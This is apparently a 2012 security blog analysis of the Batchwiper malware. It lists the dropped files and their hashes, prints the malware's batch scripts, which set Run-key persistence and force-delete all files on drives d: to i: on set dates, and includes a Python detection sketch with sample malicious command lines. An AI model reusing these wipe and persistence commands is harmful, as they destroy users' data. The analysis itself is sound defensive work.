Batchwiper: Just Another Wiping Malware

December 17, 2012  |  Jaime Blasco

A few days ago, the Iranian CERT (Maher Center) released information about a newly identified targeted malware with wiping capabilities. The piece of code is very simple, and it deletes files on different drives on specific dates.

The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:

WINDOWS\system32\SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37

WINDOWS\system32\jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6

WINDOWS\system32\juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41

Then juboot.exe is executed, and the following bat file is created and executed:

Documents and Settings\%User%\Local Settings\Temp\.tmp\juboot.bat

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
start "" /D"%systemroot%\system32" "jucheck.exe"

As you can see, the bat file uses reg.exe to create a registry key that the malware uses to maintain persistence, executing the jucheck.exe file every time the system boots.

Then jucheck.exe is executed, which creates the file Documents and Settings\Administrator\Local Settings\Temp\.tmp\jucheck.bat:

@echo off & setlocal
sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes
if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes
if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes
if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes
if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes
if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes
if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes
if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes
if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no

sleep for 3000
IF EXIST d: del "d:\*.*" /q /s /f
IF EXIST d: Chkdsk d:
IF EXIST e: del "e:\*.*" /q /s /f
IF EXIST e: Chkdsk e:
IF EXIST f: del "f:\*.*" /q /s /f
IF EXIST f: Chkdsk f:
IF EXIST g: del "g:\*.*" /q /s /f
IF EXIST g: Chkdsk g:
IF EXIST h: del "h:\*.*" /q /s /f
IF EXIST h: Chkdsk h:
IF EXIST i: del "i:\*.*" /q /s /f
IF EXIST i: Chkdsk i:
del "%userprofile%\Desktop\*.*" /q /s /f
start calc


As you can see, when the bat file is executed, juboot.exe is deleted, as is the GrooveMonitor.exe executable that resides in the Start Menu folder. The bat file then checks the system date and, if it matches one of the predefined dates, executes the wiping routine. This routine checks for system drives and then deletes every file on those drives. Finally it deletes the userprofile folder.
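A detection sketch for the behaviour described above, added here as an example and not taken from the original post or from the Maher report: it scans process-creation command lines for the jucheck.exe Run-key persistence and for forced recursive deletes across several drive roots. The (host, command line) event shape, the host names, the sample events and the two-drive threshold are assumptions.

```python
import re
from collections import defaultdict

# Patterns derived from the juboot.bat and jucheck.bat commands quoted on this page.
RUN_KEY = re.compile(r'\breg(?:\.exe)?\s+add\s+"?HKCU\\Software\\Microsoft\\Windows'
                     r'\\CurrentVersion\\Run"?\s.*\bjucheck\.exe', re.I)
ROOT_DELETE = re.compile(r'\bdel\s+"?([a-z]):\\\*\.\*"?(?:\s|$)', re.I)
SWITCH = re.compile(r'(?<!\S)/([a-z])\b', re.I)

def forced_recursive(cmd):
    """True when the command carries /q, /s and /f in any order, as in the sample."""
    return {"q", "s", "f"} <= {s.lower() for s in SWITCH.findall(cmd)}

def triage(events):
    """events: iterable of (host, command_line). Returns {host: [findings]}."""
    drives = defaultdict(set)
    findings = defaultdict(list)
    for host, cmd in events:
        if RUN_KEY.search(cmd):
            findings[host].append("persistence: Run value launching jucheck.exe")
        m = ROOT_DELETE.search(cmd)
        if m and forced_recursive(cmd):
            drives[host].add(m.group(1).upper())
    for host, wiped in drives.items():
        # Assumed threshold: one root delete may be an admin, a sweep of drives is not.
        if len(wiped) >= 2:
            findings[host].append(
                "wipe sweep: forced recursive delete of " + ", ".join(sorted(wiped)))
    return dict(findings)

# Constructed process-creation events (host, command line); not real telemetry.
SAMPLE = [
    ("ws-01", r'REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
              r'/v jucheck.exe /t REG_SZ /d "C:\WINDOWS\system32\jucheck.exe" /f'),
    ("ws-01", r'cmd /c del "d:\*.*" /q /s /f'),
    ("ws-01", r'cmd /c del "e:\*.*" /q /s /f'),
    ("ws-02", r'cmd /c del "d:\build\*.*" /q /s /f'),   # not a drive root
    ("ws-02", r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
              r'/v Updater /d "C:\Tools\upd.exe" /f'),  # unrelated Run value
    ("ws-03", r'cmd /c del "d:\*.*" /q'),               # root, but not /s /f
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE).items():
        print(host, hits)
```

Only ws-01 is reported; the benign-looking deletes and the unrelated Run value on the other hosts do not match.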

We don’t have details about the infection vector, but based on the dropper it could be deployed using USB drives, internal actors, spear phishing or probably as the second stage of a targeted intrusion.

We have built some OpenIOC indicators that you can access here.



Tags: iran, wiper, maher
